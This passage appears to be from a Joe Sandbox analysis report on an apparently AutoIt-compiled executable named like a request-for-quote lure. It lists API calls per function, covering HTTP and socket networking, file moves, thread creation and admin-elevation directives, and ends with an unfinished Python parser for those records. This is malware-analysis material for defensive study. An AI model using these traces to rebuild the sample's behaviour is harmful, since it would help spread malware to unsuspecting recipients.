                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                        • String ID: @COM_EVENTOBJ
                                                        • API String ID: 327565842-2228938565
                                                        APIs
                                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                        • String ID: H
                                                        • API String ID: 3613100350-2852464175
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 4174999648-3243417748
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 1291720006-3916222277
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                        • IsMenu.USER32(?), ref: 0045FC5F
                                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                        • String ID: 0$2
                                                        • API String ID: 93392585-3793063076
                                                        APIs
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                        • String ID: crts
                                                        • API String ID: 586820018-3724388283
                                                        APIs
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                        • _wcscat.LIBCMT ref: 0044BCAF
                                                        • _wcslen.LIBCMT ref: 0044BCBB
                                                        • _wcslen.LIBCMT ref: 0044BCD1
                                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2326526234-1173974218
                                                        APIs
                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                        • _wcslen.LIBCMT ref: 004335F2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                        • String ID: \
                                                        • API String ID: 321622961-2967466578
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                        • __lock.LIBCMT ref: 00417981
                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                        • __lock.LIBCMT ref: 004179A2
                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                        • String ID: KERNEL32.DLL$pI
                                                        • API String ID: 637971194-197072765
                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_malloc
                                                        • String ID:
                                                        • API String ID: 1938898002-0
                                                        • Opcode ID: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                        • Opcode Fuzzy Hash: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                        • _memmove.LIBCMT ref: 0044B555
                                                        • _memmove.LIBCMT ref: 0044B578
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                        • String ID:
                                                        • API String ID: 2737351978-0
                                                        • Opcode ID: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                        • Opcode Fuzzy Hash: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                        • __getptd.LIBCMT ref: 00415253
                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                        • _free.LIBCMT ref: 0041529E
                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 3638380555-0
                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 3207048006-625585964
                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                        • _memmove.LIBCMT ref: 004656CA
                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                        • String ID:
                                                        • API String ID: 2945290962-0
                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
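The records above are a flat list of per-function API traces (for example the CreateThread/ResumeThread function at 0041527A and the WSAStartup/inet_addr/gethostbyname function at 00465559), which is tedious to read by hand across a report of this size. The following is an added example, not code from the report or from Joe Sandbox: a small parser for records in the shape shown on this page (an "APIs" heading, lines of the form `Name.MODULE(args), ref: addr`, and a "Similarity" block of `Key: value` lines) that tags each function by behaviour class. The tag rules and the argument decoding (CreateThread's fifth argument as dwCreationFlags, WSAStartup's first as wVersionRequested) are this example's own heuristics, and `SAMPLE` is a constructed excerpt assembled from lines on this page, with one nested call abridged and a third record shown without its API lines. It does not reproduce the report's own "API ID" or "String ID" similarity hashes.

```python
"""Behaviour triage over Joe Sandbox per-function API listings (added example,
not report or Joe Sandbox code). Input records look like the ones on this page:
an "APIs" heading, lines "Name.MODULE(args), ref: addr", then a "Similarity"
block of "Key: value" lines. All tags below are this example's heuristics."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: two records taken from the page (one nested call abridged)
# plus a third whose API lines are omitted, so only its Similarity block remains.
SAMPLE = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000), ref: 0045F661
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• _memmove.LIBCMT ref: 004656CA
• WSACleanup.WSOCK32 ref: 00465762
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
• String ID:
• Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
APIs
• CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
• ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
Similarity
• String ID:
• Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
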